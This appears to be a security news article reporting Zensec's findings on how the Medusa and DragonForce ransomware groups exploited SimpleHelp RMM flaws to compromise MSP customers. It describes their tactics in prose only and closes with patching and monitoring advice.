MSP Nightmare: Medusa & DragonForce Exploit SimpleHelp RMM Flaws for SYSTEM Access

A new report from Zensec has exposed a critical vulnerability in the IT supply chain, detailing how two major Ransomware-as-a-Service (RaaS) groups, Medusa and DragonForce, are actively exploiting unpatched vulnerabilities in the SimpleHelp Remote Monitoring and Management (RMM) platform. This platform, widely trusted by Managed Service Providers (MSPs), became the initial access vector, granting attackers powerful, SYSTEM-level privileges to compromise numerous downstream customer environments.

The campaigns, uncovered in early 2025, leveraged a trio of flaws—CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728—to pivot from compromised RMM servers into victim networks with “minimal friction.”

In the first quarter of 2025, Medusa ransomware operators launched a wave of coordinated attacks against UK organisations through compromised MSPs.

Once inside, the Medusa operators deployed PDQ Inventory and PDQ Deploy utilities — typically used for network-wide software management — to distribute and execute ransomware payloads such as Gaze.exe or REDACTED.exe.

“PDQ Deploy was leveraged to push and run base64-encoded PowerShell commands that disabled or altered Microsoft Defender and added Defender exclusions.”

The ransomware encrypted files with the extension “.MEDUSA”, leaving ransom notes titled “!!!READ_ME_MEDUSA!!!.txt” across infected systems. In roughly half of the incidents, operators also exfiltrated sensitive data using RClone, renamed as lsp.exe, to avoid detection.

Zensec notes that Medusa’s operations follow a double-extortion model, hosting victims’ stolen data on a dark web leak site and promoting proof-of-life packs via Telegram channels.

Zensec researchers further discovered that Medusa masqueraded as a faux cybersecurity news outlet:

“The group pretended to be a cyber security news site, publishing videos documenting the leaks… sometimes as long as 20 minutes.”

By mid-2025, a separate campaign attributed to the DragonForce Ransomware-as-a-Service (RaaS) group emerged, following a nearly identical intrusion vector.

The DragonForce operators also exploited unpatched SimpleHelp instances to gain SYSTEM-level access, then established persistence using AnyDesk and new local admin accounts. In a notable twist, they used Restic, an open-source backup tool, to exfiltrate data — effectively performing “unscheduled off-site backups” to attacker-controlled cloud storage.

Zensec analysts traced the exfiltration to Wasabi cloud storage endpoints, often seen in enterprise backup configurations.

Encrypted files carried the extension “.dragonforce_encrypted”, and ransom notes named “readme.txt” contained instructions to contact the group via TOX ID chat, with filenames obfuscated by random character strings.

As with Medusa, DragonForce maintains a dark web data leak site and public-facing blog where victim data is posted in staged releases, following the double-extortion pattern.

Zensec’s findings highlight the critical supply-chain risk posed by compromised RMM software, warning that unpatched vendor tools can grant adversaries deep lateral access across multiple customer environments.

The firm advises immediate patching of SimpleHelp servers and recommends that MSPs enforce strict access controls, continuous monitoring, and role-based privilege segmentation.

Additionally, organisations should review all RMM tool telemetry, PowerShell execution logs, and unusual outbound transfers to cloud storage providers.

Related Posts:

• Ransomware Attack: MSP’s RMM Tool Abused to Spread DragonForce
• Medusa Ransomware: A Sinister Evolution in Cyber Extortion
• Medusa Exploits Fortinet Flaw (CVE-2023-48788) for Stealthy Ransomware Attacks
• Threat Actors Exploit SimpleHelp Vulnerabilities to Deploy Sliver Backdoor
• FBI, CISA, and MS-ISAC Warn Organizations About Medusa Ransomware Attacks